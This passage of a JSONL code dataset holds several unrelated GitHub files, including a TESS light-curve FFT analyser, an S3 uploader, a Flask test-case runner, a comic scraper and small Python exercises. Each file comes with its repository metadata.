list(map(int, input().split()))\n k = int(input())\n print(get_kth_element(arr, k))\n\n\nif __name__ == '__main__':\n solution()\n","repo_name":"angelinagnedina/AAA-academy","sub_path":"Algorithms_class/module_5_k-th_order_statistic.py","file_name":"module_5_k-th_order_statistic.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26466193157","text":"# sklep internetowy\r\n# użyj klasy produkt\r\n# zrób klase koszyk, do którego można wrzucić produkty\r\n# na koniec niech koszyk powie jaka jest jego sumaryczna wartosc\r\nfrom collections import defaultdict\r\n\r\n\r\nclass Produkt():\r\n def __init__(self, id, nazwa, cena):\r\n self.id = id\r\n self.nazwa = nazwa\r\n self.cena = cena\r\n self.kolor = \"biały\"\r\n\r\n def wypisz_info(self):\r\n return f'ID: {self.id}, \"{self.nazwa}\", cena: {self.cena:.2f} PLN'\r\n\r\nclass Koszyk():\r\n def __init__(self):\r\n self._pudelko = defaultdict() # po wpisaniu defaultdict() podkreśli się na czerwono, wtedy robimy\r\n # lewy Alt+Enter i na samej górze pojawi się \"from collections import defaultdict\r\n\r\n def dodaj(self, prod, ile):\r\n if prod in self._pudelko:\r\n self._pudelko[prod] += ile # już był produkt w pudełku\r\n else:\r\n 
self._pudelko[prod] = ile # wrzucamy pierwszy raz\r\n\r\n def podlicz_sie(self):\r\n\r\n wynik = 0\r\n for prod in self._pudelko:\r\n wynik += self._pudelko[prod] * prod.cena\r\n\r\n sum(x.cena * self._pudelko[x] for x in self._pudelko) # to jest wyrażenie listowe\r\n return wynik\r\n\r\nzakupy = Koszyk()\r\nprod1 = Produkt(1,'jabłko',3)\r\nzakupy.dodaj(prod1, 10)\r\nprod2 = Produkt(2,'gruszka',10)\r\nzakupy.dodaj(prod2, 6)\r\nzakupy.dodaj(prod1, 10)\r\n\r\n\r\nprint(zakupy.podlicz_sie()) # ==> 120\r\n\r\n\r\n\"\"\"\r\nMoje notatki: tak tworzymy słownik i sprawdzamy, czy coś w nim jest:\r\nsl = dict()\r\nsl['klucz'] = 3\r\nsl\r\n{'klucz': 3}\r\n'ala' in sl\r\nFalse\r\n\"\"\"\r\n","repo_name":"PatrycjaHomosapiens/Python","sub_path":"Obiekty_Zad_5_moje_defaultdict.py","file_name":"Obiekty_Zad_5_moje_defaultdict.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5639322762","text":"\"\"\"\n\nThis is the main program for the SPOC Catcher.\n\nA problem with this is that PDO uses Python 2.7 and we're using 3.7\n\nAside from having division issues everything is fine?\n\n\nThink about TVOI database\n\n\nmay want to move detection threshold out of the catcher\n\n\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport glob\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom scipy import signal as scipy_signal\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n#from skimage.measure.tests.test_simple_metrics import cam\n#plt.rcParams.update({'figure.max_open_warning': 0})\n\nfrom matplotlib.gridspec import GridSpec,GridSpecFromSubplotSpec\n\nfrom scipy.signal import find_peaks\n\nDIR = os.path.abspath(os.path.dirname(__file__))\nsys.path.insert(0, os.path.join(DIR, '../..'))\n\nimport src.util.configurable as config\nimport src.util.gaia_query as gaia\nimport src.main.Lightcurve_io3 as LC_io\n\nimport src.main.FFT_Analysis as FFT\nimport src.main.LC_Analysis as LCA\nimport src.main.Period_Analysis as PA\nfrom src.util.common_filepaths import return_all_sector_datapath,return_interested_target_datapath\nfrom src.util.common_algorithm import segment_array,pad_array_index\nfrom src.util.star_query import get_star_info,get_exofop_nearby\n\nuser_input = config.Configuration(\"../../input/configs/user_input_test.cfg\")\n\n\nclass General_Catcher():\n \n def __init__(self):\n pass\n\nclass SPOC_Catcher():\n\n def __init__(self,filename,savepath,sector=0,Norm=0,detrending=721,manual_cut=[]):\n \n self.filename = filename\n self.sector = sector\n self.Normalization = Norm\n self.savepath = savepath\n self.detrending = detrending\n self.manual_cut = manual_cut\n \n # here are regions that \"just works\"\n # eventually I want to optimize this for physical objects\n self.min = 0\n self.slow = 0\n self.low = 6\n self.mid = 48\n self.high = 96\n self.max = 360\n \n self.slow_thres = 12\n self.low_thres = 12\n self.mid_thres = 12\n self.high_thres = 13\n \n self.bump_frequency = True\n self.freq_catch_cut = 1 # truncate frequency smaller than 1\n self.Outlier_Multiplier = 0.15\n\n def Load_Lightcurve_Data(self):\n\n self.TVOI = LC_io.SPOC_TVOI(self.filename,self.savepath,self.sector,self.Normalization,self.manual_cut)\n self.TVOI.load_object_data(self.detrending)\n\n def Detection_Threshold(self,amplitude,rms_thres,local_pt,method,offset=0,prevmean=\"0\"):\n\n if method == \"Local Mean\":\n \n outlier = 
int(local_pt*self.Outlier_Multiplier)\n seg_array = segment_array(amplitude,local_pt)\n \n bin_mean = np.sum(seg_array,1)/local_pt\n bin_rms = np.array([np.sqrt(np.sum((np.sort(local_data)[outlier:-outlier]-local_mean)**2)/(local_pt-2*outlier)) for local_mean,local_data in zip(bin_mean,seg_array)])\n bin_thres = bin_mean + bin_rms*rms_thres\n \n plot_mean = (np.ones((np.shape(seg_array)[0],local_pt))*np.array(bin_mean).reshape((-1,1))).reshape(-1)[:len(amplitude)]\n plot_thres = (np.ones((np.shape(seg_array)[0],local_pt))*np.array(bin_thres).reshape((-1,1))).reshape(-1)[:len(amplitude)] \n\n elif method == \"Slope Mean\":\n \n outlier = int(local_pt*self.Outlier_Multiplier)\n \n low_amp_trim = np.sort(amplitude[:local_pt*2])[outlier:-outlier]\n low_mean = np.mean(low_amp_trim)\n low_rms = np.sqrt(np.sum((low_amp_trim-low_mean)**2)/len(low_amp_trim))\n low_thres = low_mean + low_rms*rms_thres\n \n high_amp_trim = np.sort(amplitude[-local_pt*2:])[outlier:-outlier]\n high_mean = np.mean(high_amp_trim)\n high_rms = np.sqrt(np.sum((high_amp_trim-high_mean)**2)/len(high_amp_trim))\n high_thres = high_mean + high_rms*rms_thres\n \n plot_mean = np.linspace(low_mean,high_mean,len(amplitude)+1)[:-1]\n plot_thres = np.linspace(low_thres,high_thres,len(amplitude)+1)[:-1]\n\n \n elif method == \"Global Mean\":\n \n outlier = int(len(amplitude)*self.Outlier_Multiplier)\n amplitude_trim = np.sort(amplitude)[outlier:-outlier]\n \n global_mean = np.mean(amplitude_trim)\n global_rms = np.sqrt(np.sum((amplitude_trim-global_mean)**2)/len(amplitude_trim))\n global_thres = global_mean + global_rms*rms_thres\n \n plot_mean = np.ones(len(amplitude))*global_mean\n plot_thres = np.ones(len(amplitude))*global_thres\n \n elif method == \"Boxcar Mean\":\n \n Total_pt = len(amplitude)\n plot_mean = np.zeros(Total_pt)\n plot_rms = np.zeros(Total_pt)\n \n for i in range(Total_pt):\n \n head = int(i - (local_pt)/2)+offset\n tail = int(i + (local_pt)/2)+offset\n \n if head < 0:\n head = 0\n if tail > len(self.amplitude):\n tail = Total_pt+offset\n local_data = self.amplitude[head:tail]\n outlier = int(len(local_data)*self.Outlier_Multiplier)\n local_mean = np.mean(local_data) \n local_rms = np.sqrt(np.sum((np.sort(local_data)[outlier:-outlier]-local_mean)**2/(local_pt-outlier*2)))# for local_mean,local_data in zip(local_mean,seg_array)])\n plot_mean[i] = local_mean\n plot_rms[i] = local_rms\n \n \n plot_thres = plot_mean+plot_rms*rms_thres\n \n else:\n pass\n \n return plot_mean, plot_thres\n \n def Conduct_FFT_Analysis(self):\n \n self.N1 = FFT.guess_N(len(self.TVOI.time_bin),8,False)\n # TVOI.signal_bin_detrended is reserved for visualization and data folding purpose\n self.extended_time, self.extended_signal = LCA.extend_lightcurve(self.TVOI.signal_bin_cleaned,self.N1,self.Normalization)\n\n FFT_Result = FFT.compute_fft_general(self.extended_signal, self.TVOI.time_step, self.N1) \n self.freq,self.sig,self.amplitude,self.power = FFT_Result\n\n\n # I want to catch things that are: \n # 0.33-4 (3day-6hr), 4-24(6-1hr),24-96 (1hr - 15min), 96-360(15-4min)\n # slow,low,mid,high\n # consider testing a second detrending after the initial slow oscillations are caught\n \n local_pt = 2**8\n \n self.total_bin_num = len(self.freq)\n self.slow_start_bin = int(self.total_bin_num*self.slow/self.max)\n self.low_start_bin = int(self.total_bin_num*self.low/self.max)\n self.mid_start_bin = int(self.total_bin_num*self.mid/self.max)\n self.high_start_bin = int(self.total_bin_num*self.high/self.max)\n \n self.slow_end_bin = 
pad_array_index(self.slow_start_bin,self.low_start_bin,local_pt)\n self.low_end_bin = pad_array_index(self.low_start_bin,self.mid_start_bin,local_pt)\n self.mid_end_bin = pad_array_index(self.mid_start_bin,self.high_start_bin,local_pt)\n self.high_end_bin = self.total_bin_num # this gets special treatment because it's the end of the array, need to pad start index\n self.high_start_bin = pad_array_index(self.mid_end_bin,self.high_end_bin,local_pt,reverse=True)\n \n self.slow_mean, self.slow_thres = self.Detection_Threshold(self.amplitude[self.slow_start_bin:self.slow_end_bin],\n self.slow_thres,local_pt*2,\"Boxcar Mean\",offset=self.slow_start_bin,prevmean=True) \n self.low_mean, self.low_thres = self.Detection_Threshold(self.amplitude[self.low_start_bin:self.low_end_bin],\n self.low_thres,local_pt, \"Boxcar Mean\",offset=self.low_start_bin)\n self.mid_mean, self.mid_thres = self.Detection_Threshold(self.amplitude[self.mid_start_bin:self.mid_end_bin],\n self.mid_thres,local_pt,\"Boxcar Mean\",offset=self.mid_start_bin)\n self.high_mean, self.high_thres = self.Detection_Threshold(self.amplitude[self.high_start_bin:self.high_end_bin],\n self.high_thres,local_pt,\"Local Mean\")\n \n # boxcar mean is very powerful for some cases and not others\n # I need a way to use multiple detection methods and \n # figure out a way to combine their results in a future iteration of development\n # also need to calculate the amplitude of the FFT peaks\n \n self.slow_peaks,_ = find_peaks(self.amplitude[self.slow_start_bin:self.slow_end_bin],self.slow_thres)\n self.low_peaks,_ = find_peaks(self.amplitude[self.low_start_bin:self.low_end_bin],self.low_thres)\n self.mid_peaks,_ = find_peaks(self.amplitude[self.mid_start_bin:self.mid_end_bin],self.mid_thres)\n self.high_peaks,_ = find_peaks(self.amplitude[self.high_start_bin:self.high_end_bin],self.high_thres)\n \n \n self.num_slow_peaks = len(self.slow_peaks)\n self.num_low_peaks = len(self.low_peaks)\n self.num_mid_peaks = len(self.mid_peaks)\n self.num_high_peaks = len(self.high_peaks)\n \n \n self.peak_index = list(set(list(self.slow_peaks+self.slow_start_bin)+\n list(self.low_peaks+self.low_start_bin)+\n list(self.mid_peaks+self.mid_start_bin)+\n list(self.high_peaks+self.high_start_bin)))\n \n self.num_peaks = len(self.peak_index)\n \n if self.num_peaks < 1:\n # future iterations should still generate simpler diagnostic plots for objects without anything found\n # this proves to be useful when someone raises certain objects for consideration \n # also good for checking if the code is performing well\n # I will need a list of \"should catch\" and a list of \"should not catch\" for testing purposes\n # print(\"No FFT Peak Found\")\n self.period_flag = False\n self.should_generate = False\n self.sorted_peaks = []\n return 0\n \n \n peaks = list(zip(self.amplitude[self.peak_index],self.peak_index))\n dtype = [('power', float), ('index', int)]\n self.sorted_peaks = np.sort(np.array(peaks, dtype=dtype), order='power')[::-1][:3]\n \n \n \n # Trying to refine peak detection and find the principal folding frequency\n \n self.N2 = FFT.guess_N(len(self.TVOI.time_bin),128,True)\n extended_time1, extended_signal1 = LCA.extend_lightcurve(self.TVOI.signal_bin_cleaned,self.N2,self.Normalization)\n FFT_Result = FFT.compute_fft_general(extended_signal1, self.TVOI.time_step, self.N2) \n freq1,sig1,amplitude1,power1 = FFT_Result\n \n total_bin_num1 = len(freq1)\n \n low_threshold = int(total_bin_num1*self.slow/360) # filter everything longer than 2 days\n high_threshold = 
int(total_bin_num1*24/360) # filter everything shorter than 1 hr\n \n #target_freq = freq1[low_threshold:high_threshold]\n #target_amp = amplitude1[low_threshold:high_threshold]\n \n predict_frequency = 1\n peak_frequencies = []\n new_peak_indexs = []\n check_param = 128 # get the amplitude of the function \n for incident_peak in self.sorted_peaks:\n \n incident_peak_index = incident_peak[1]\n potential_peak_index = int(incident_peak_index*self.N2/self.N1)\n \n if potential_peak_index > high_threshold-check_param or potential_peak_index < low_threshold+check_param:\n continue\n \n rel_new_peak_index,_ = find_peaks(amplitude1[potential_peak_index-check_param:potential_peak_index+check_param],\n amplitude1[potential_peak_index-check_param])\n \n new_peak_index = rel_new_peak_index[0]+potential_peak_index-check_param\n \n frequency = freq1[new_peak_index]\n peak_frequencies.append(frequency)\n new_peak_indexs.append(new_peak_index)\n \n \n \n pfi = np.array(new_peak_indexs)\n self.period_flag = False\n if len(pfi) != 0 and self.bump_frequency:\n try: # magic that I can't understand... presumably check if harmonic is present?\n pfi_index = [i for i, x in enumerate(pfi[1:]-int(pfi[0]/2) < 0.01*pfi[0]) if x][0]+1\n self.predict_frequency = peak_frequencies[pfi_index]\n self.period_flag = True\n except:\n pfi_index = pfi[0]\n self.predict_frequency = peak_frequencies[0]\n else:\n self.predict_frequency = self.freq[self.sorted_peaks[0][1]]\n \n \n #self.predict_frequency = peak_frequencies[1]\n # FFT amplitude doesn't matter?\n predict_frequency_amplitude = 0\n #print(self.predict_frequency) \n \n # truncate any period longer than 1 day\n if self.predict_frequency < self.freq_catch_cut:\n self.should_generate = False\n return 0\n else:\n self.should_generate = True \n return 1 \n","repo_name":"zhuchangzhan/TVOI","sub_path":"src/main/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":13567,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32956907540","text":"# Generate lotto numbers\n# print 6 random numbers from 1 to 45\n# import random\n# alist = []\n# for i in range(6):\n# rnd = random.randint(1, 45)\n# alist.append(rnd)\n# print(alist)\n \nfrom dask.array.random import random\n\narr45 = list(range(1, 45+1))\nfor i in range(100):\n rnd = int(random() * len(arr45))\n #print(\"rnd value\", rnd)\n a = arr45[0]\n b = arr45[rnd]\n arr45[0] = b\n arr45[rnd] = a\nprint(arr45[0:6])\n","repo_name":"JAEGyEOng69/Python","sub_path":"workspace_python/HELLO_PYTHON/day02/mytest03.py","file_name":"mytest03.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18649975715","text":"# 32.Complete the function that takes a non-negative integer n as input, and returns a list of\n# all the powers of 2 with the exponent ranging from 0 to n (inclusive).\n# n = 0 ==> [1] #[2^0]\n# n = 1 ==> [1, 2] # [2^0, 2^1]\n# n = 2 ==> [1, 2, 4] # [2^0, 2^1, 2^2].\n\ndef powers(n):\n a=[]\n for i in range(0,n+1):\n a.append(2**i)\n return a\nnum=int(input(\"enter a number\"))\nprint(powers(num))","repo_name":"shanti96/function","sub_path":"32 .the powers of 2 with the exponent ranging.py","file_name":"32 .the powers of 2 with the exponent ranging.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3097630433","text":"\nimport boto3\nfrom botocore.exceptions import 
ClientError\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nimport os\n\n\ndef upload_file(file_name, bucket, object_name=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param object_name: S3 object name. If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\nlogging.info(\"Starting upload of gacetas to S3 bucket\")\ngaceta_list = os.listdir('gacetas')\n\nfor gaceta in gaceta_list:\n logging.info(\"uploading file: \"+gaceta)\n path = \"gacetas/\"+gaceta\n file_uploaded = upload_file(path, 'gacetas', object_name=gaceta)\n if file_uploaded:\n logging.info(\"file \"+gaceta+\" uploaded!\")\n print(\"-\"*20)\n else:\n logging.warning(\"file \"+gaceta+\" failed to upload\")\n\nlogging.info(\"Load finished\")","repo_name":"Luisehica/ETL-Gacetas","sub_path":"Load_to_s3.py","file_name":"Load_to_s3.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3863427806","text":"import time\nimport multiprocessing\nfrom contextlib import contextmanager\n\n# See https://www.microprediction.com/blog/robust-optimization for explanation\n\n\nclass WorkerQueue:\n\n def __init__(self,num_workers):\n self.queue = multiprocessing.Manager().Queue()\n _ = [ self.queue.put(i) for i in range(num_workers)]\n\n @contextmanager\n def next_available(self):\n current_idx = self.queue.get()\n yield current_idx\n self.queue.put(current_idx)\n\n\nclass Parallel:\n\n \"\"\" Turn f(worker, *args, **kwargs) into g(*args, **kwargs)\n So if you need to call g() a lot, write a version with one pre-pended argument then do g = Parallel(f)\n \"\"\"\n\n def __init__(self, func, num_workers):\n self.queue = WorkerQueue(num_workers=num_workers)\n self.func = func\n\n def __call__(self, *args, **kwargs):\n with self.queue.next_available() as worker:\n return self.func(worker,*args,**kwargs)\n\n\n# Usage example....\nif __name__=='__main__':\n start_time = time.time()\n\n def boss(i, x):\n print('Gonna send '+str(x)+' to server '+str(i))\n time.sleep(5)\n return x\n\n task = Parallel(boss, num_workers=5)\n\n from multiprocessing import Pool\n with Pool(5) as p:\n print( p.map(task,[1,3,4,2,3,1,7,3,2,1,4,1] ) )\n\n print(\"Time taken: \"+str(time.time()-start_time))","repo_name":"microprediction/embarrassingly","sub_path":"embarrassingly/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"13532196959","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/30 9:15 PM\n# @Author : ShaHeTop-Almighty-ares\n# @Email : yang6333yyx@126.com\n# @File : case_exec_api.py\n# @Software: PyCharm\n\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom all_reference import *\nfrom app.models.test_case.models import TestCase\nfrom app.models.test_env.models import TestEnv\nfrom app.models.test_logs.models import TestLogs\nfrom app.models.test_case_scenario.models import TestCaseScenario\nfrom common.libs.StringIOLog import StringIOLog\n\nexecutor = 
ThreadPoolExecutor(10)\n\n\nclass CaseReqTestApi(MethodView):\n \"\"\"\n test send\n \"\"\"\n\n def post(self):\n data = request.get_json()\n method = data.get('method')\n base_url = data.get('base_url')\n url = data.get('url')\n headers = data.get('headers', {})\n req_type = data.get('req_type')\n body = data.get('body', {})\n\n send = {\n \"url\": base_url + url if base_url else url,\n \"headers\": headers,\n req_type: body\n }\n\n if req_type not in [\"params\", \"data\", \"json\"]:\n return api_result(code=400, message='req_type 应该为:{}'.format([\"params\", \"data\", \"json\"]))\n\n try:\n if hasattr(requests, method):\n response = getattr(requests, method)(**send, verify=False)\n data = {\n \"response\": response.json(),\n \"response_headers\": dict(response.headers)\n }\n return api_result(code=200, message='操作成功', data=data)\n else:\n return api_result(code=400, message='请求方式:{}不存在'.format(method))\n except BaseException as e:\n return api_result(code=400, message='请求方式失败:{}'.format(str(e)))\n\n\nclass CaseExecApi(MethodView):\n \"\"\"\n 用例执行Api\n GET:\n POST: 用例执行\n PUT:\n DELETE:\n \"\"\"\n\n def post(self):\n \"\"\"\n 用例执行\n\n 用例执行\n {\n \"execute_id\": 14,\n \"execute_type\": \"case\",\n \"data_driven\": False\n \"base_url_id\": 1\n }\n\n 场景执行\n {\n \"execute_id\": 3,\n \"execute_type\": \"scenario\",\n \"data_driven\": false\n \"base_url_id\": 1\n }\n :return:\n \"\"\"\n execute_type_em = (\"case\", \"scenario\")\n data = request.get_json()\n execute_id = data.get('execute_id')\n execute_type = data.get('execute_type')\n data_driven = data.get('data_driven', False)\n base_url_id = data.get('base_url_id', None)\n\n send_test_case_list = []\n\n query_base_url = TestEnv.query.get(base_url_id)\n\n if not query_base_url:\n return api_result(code=400, message='base_url_id:{}不存在'.format(base_url_id))\n\n if execute_type not in execute_type_em:\n return api_result(code=400, message='execute_type:{}不存在'.format(execute_type))\n\n if execute_type == \"case\":\n result = query_case_zip(case_id=execute_id)\n if not result:\n return api_result(code=400, message='用例id:{}不存在'.format(execute_id))\n\n TestCase.query.get(execute_id).add_total_execution()\n send_test_case_list = [result]\n\n if execute_type == \"scenario\":\n result = TestCaseScenario.query.get(execute_id)\n if not result:\n return api_result(code=400, message='场景id:{}不存在'.format(execute_id))\n\n case_list = result.to_json().get('case_list')\n\n if not case_list: # 防止手动修改数据导致,在场景创建的接口中有对应的校验\n return api_result(code=400, message='场景id:{}用例为空'.format(execute_id))\n\n send_test_case_list = []\n for case_id in case_list:\n result = query_case_zip(case_id=case_id)\n if not result:\n return api_result(code=400, message='场景中,用例id:{}不存在'.format(case_id))\n send_test_case_list.append(result)\n\n update_case = TestCase.query.filter(TestCase.id.in_(case_list)).all()\n for u in update_case:\n u.add_total_execution()\n\n sio = StringIOLog()\n test_obj = {\n \"base_url\": query_base_url.env_url,\n \"execute_type\": execute_type,\n \"case_list\": send_test_case_list,\n \"data_driven\": data_driven,\n \"sio\": sio\n }\n main_test = MainTest(test_obj=test_obj)\n executor.submit(main_test.main)\n tl = TestLogs(\n log_type=execute_type,\n creator=g.app_user.username,\n creator_id=g.app_user.id\n )\n tl.save()\n return api_result(code=200, message='操作成功,请前往日志查看执行结果', 
data=[id(sio)])\n","repo_name":"chentuqin/ExileTestPlatformServer","sub_path":"app/api/case_exec_api/case_exec_api.py","file_name":"case_exec_api.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23386148534","text":"import os\nfrom django.conf import settings\n\"\"\"\nThis file contains constants for various things in the app.\nDONT STRING MATCH\nput stuff in here and import to other files.\nAlso dont import things into here, circular dependencies == bad\n\"\"\"\n\nSTATE_CHOICES = [\n (\"FL\", \"Florida\"),\n]\n\nCOUNTRY_CHOICES = [\n (\"US\", \"United States of America! YEAH!\"),\n]\n\nSESSION_VARS = {\n 'gatorlink': 'gatorlink',\n 'email': 'email',\n 'first_name': 'first_name',\n 'last_name': 'last_name',\n 'previous_log_id': 'previous_log_id',\n 'timeout_time': 1217\n}\n\nQI_CHECK = {\n 'no': 0,\n 'yes': 1,\n 'no_program': 2,\n}\n\nADDRESS_TYPE= {\n 'business': 'business',\n 'organization': 'organization',\n}\n\nanswer_submit_names = {\n 'question_id': 'question_id',\n 'choice_id': 'choice_id',\n 'project_id': 'project_id',\n}\n\nanswer_response_names = {\n 'user_id': 'user_id',\n 'question_id': 'question_id',\n 'choice_id': 'choice_id',\n 'project_id': 'project_id',\n 'response_id': 'response_id',\n 'newly_created': 'newly_created',\n}\n\nanswer_submit_names = {\n 'question_id': 'question_id',\n 'choice_id': 'choice_id',\n 'project_id': 'project_id',\n}\n\nprojects_per_page = 25\n\nusers_per_page = 25\n\nsimilarity_factors = {\n 'big_aim': 10,\n 'category': 10,\n 'clinical_setting': 10,\n 'clinical_area': 10,\n 'description': 25,\n 'keyword': 25,\n 'title': 10,\n}\n\napi_username = 'admin_api_user'\n\nfixture_username = 'admin_fixture_user'\n\ngatorlink_header = 'Glid'\n\nbridge_key = os.environ['QIPR_SHARED_BRIDGE_KEY']\n\nprotocol = 'http://' if (os.environ['DJANGO_CONFIGURATION'] == 'development') else 'https://'\n\nregistry_host = protocol + os.environ['QIPR_APPROVER_REGISTRY_HOST']\n\nregistry_port = os.environ['QIPR_APPROVER_REGISTRY_PORT']\n\nregistry_path = os.environ['QIPR_APPROVER_REGISTRY_PATH']\n\nregistry_hostport = registry_host + (':' + registry_port if registry_port else '')\n\nregistry_hostportpath = registry_hostport + ( registry_path if registry_path else '')\n\nregistry_search_path = registry_hostportpath + '/search'\n\nregistry_endpoints = {\n 'add_model': '/'.join([registry_hostportpath, 'api', 'add_model']),\n}\n\nemail_url = protocol + os.environ['QIPR_APPROVER_APPROVER_HOST']\n\nbase_url = protocol + os.environ['QIPR_APPROVER_APPROVER_HOST'] + os.environ['QIPR_APPROVER_APPROVER_PATH']\n\napp_label = 'approver'\n\ntotal_qualifiers_2017 = 80\n\nSHIB_ENABLED = os.getenv('SHIB_ENABLED', 'true')\n\nemail_from_address = settings.QIPR_EMAIL_RETURN_ADDR\n\ninvalid_email_characters = [\n '\"',\n ' ',\n]\n\n# Internet explorer 8 is bad\nbad_user_agent_strings = [\n 'MSIE 8.0',\n]\n\nis_staging = True if os.environ['IS_STAGING'] == 'true' else False\n\nVERSION_NUMBER = '1.4.0'\n","repo_name":"ctsit/qipr_approver","sub_path":"qipr_approver/approver/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6092434373","text":"#!/usr/bin/env python\n# coding: utf-8\n\n### scrapnąć wszystkie komiksy garfielda ze strony mirrora. 
>> 01.iv.23 vB\n# http://pt.jikos.cz/garfield/\n\n\nimport urllib.request\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport re\nfrom time import sleep\n\n \n\ndef getHTMLdocument(url):\n # function to extract html document from given url\n # request for HTML document of given url\n response = requests.get(url)\n return response.text\n\ndef get_linki_lat(url):\n # zwraca liste urli poszczególnych roczników garfielda\n lista_ul = []\n html_document = getHTMLdocument(url)\n soup = bs(html_document, 'html.parser')\n for link in soup.find_all('a', #znajdź wszystkie pola rocznik \", rocznik)\n for miesiac in range(1,13):\n print(\"-> mc \", miesiac, end=\".. \")\n obrazky = get_linki_obrazow(rocznik+str(miesiac)+\"/\")\n #print(obrazky)\n sleep(9) #opcja odciążenia serwera przez dodanie dodatkowej przerwy między pobraniami \n for obrazek in obrazky:\n print(\".\", end=\"\") #kropka postępu pobierania\n get_obrazek(sciezka,obrazek)\n #sleep(1) #opcja odciążenia serwera przez dodanie 1 sekundowej przerwy między pobraniami \n i+=1\n print()\n print(i, \"# \\n\")\nprint(\"\\n fin as of\", i, \" files.\")\n\n\n","repo_name":"pjogi-testy/scraping-garfield","sub_path":"garfield_cartoon_scrape_script.py","file_name":"garfield_cartoon_scrape_script.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23176785835","text":"from typing import Dict, List, Union\n\nfrom backend.resources.networks.common.formatter import NetworkFormatter\nfrom backend.utils.basic import getitems\n\n\nclass IngressFormatter(NetworkFormatter):\n \"\"\" Ingress 格式化 \"\"\"\n\n def parse_hosts(self, resource_dict: Dict) -> List:\n \"\"\" 解析 Ingress hosts \"\"\"\n rules = getitems(resource_dict, 'spec.rules', [])\n return [r.get('host') for r in rules]\n\n def parse_addresses(self, resource_dict: Dict) -> List:\n \"\"\" 解析 Ingress address \"\"\"\n addresses = []\n for ingress in getitems(resource_dict, 'status.loadBalancer.ingress', []):\n if ingress.get('ip'):\n addresses.append(ingress['ip'])\n elif ingress.get('hostname'):\n addresses.append(ingress['hostname'])\n return addresses\n\n def parse_default_ports(self, resource_dict: Dict) -> Union[str, int]:\n \"\"\"\n 解析 Ingress 默认 port\n 默认是 HTTP 端口,如果有TLS配置则为 HTTP + HTTPS 端口\n \"\"\"\n return '80, 443' if 'tls' in resource_dict['spec'] else '80'\n\n def format_dict(self, resource_dict: Dict) -> Dict:\n res = self.format_common_dict(resource_dict)\n res.update(\n {\n 'hosts': self.parse_hosts(resource_dict),\n 'addresses': self.parse_addresses(resource_dict),\n 'default_ports': self.parse_default_ports(resource_dict),\n }\n )\n return res\n","repo_name":"zekai-li/bk-bcs-saas","sub_path":"bcs-app/backend/resources/networks/ingress/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"10525809984","text":"from menu import Menu, MenuItem\nfrom coffee_maker import CoffeeMaker\nfrom money_machine import MoneyMachine\n\ncoffee = CoffeeMaker()\nmoney = MoneyMachine()\nmenu = Menu()\n\nwhile True:\n options = menu.get_items()\n order = input(f\"What would you like? 
({options}): \")\n if order == \"stop\":\n break\n \n elif order == \"report\":\n coffee.report()\n money.report()\n\n else:\n drink = menu.find_drink(order)\n if coffee.is_resource_sufficient(drink):\n if money.make_payment(drink.cost):\n coffee.make_coffee(drink)\n","repo_name":"AakashChahal/100DaysOfCode","sub_path":"oop-coffee-machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69895274730","text":"import datetime\nimport numpy as np\nimport tensorflow as tf\nimport trimesh\nimport argparse\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom pathlib import Path\n\n\nclass OrthogonalRegularizer(keras.regularizers.Regularizer):\n def __init__(self, num_features, l2reg=0.001):\n self.num_features = num_features\n self.l2reg = l2reg\n self.eye = tf.eye(num_features)\n\n def __call__(self, x):\n x = tf.reshape(x, (-1, self.num_features, self.num_features))\n xxt = tf.tensordot(x, x, axes=(2, 2))\n xxt = tf.reshape(xxt, (-1, self.num_features, self.num_features))\n return tf.reduce_sum(self.l2reg * tf.square(xxt - self.eye))\n\n def get_config(self):\n return {\n 'num_features': self.num_features,\n 'l2reg': self.l2reg,\n }\n\n @classmethod\n def from_config(cls, config):\n return OrthogonalRegularizer(\n num_features=config['num_features'], l2reg=config['l2reg'])\n\n\ndef conv_bn(x, filters):\n x = layers.Conv1D(filters, 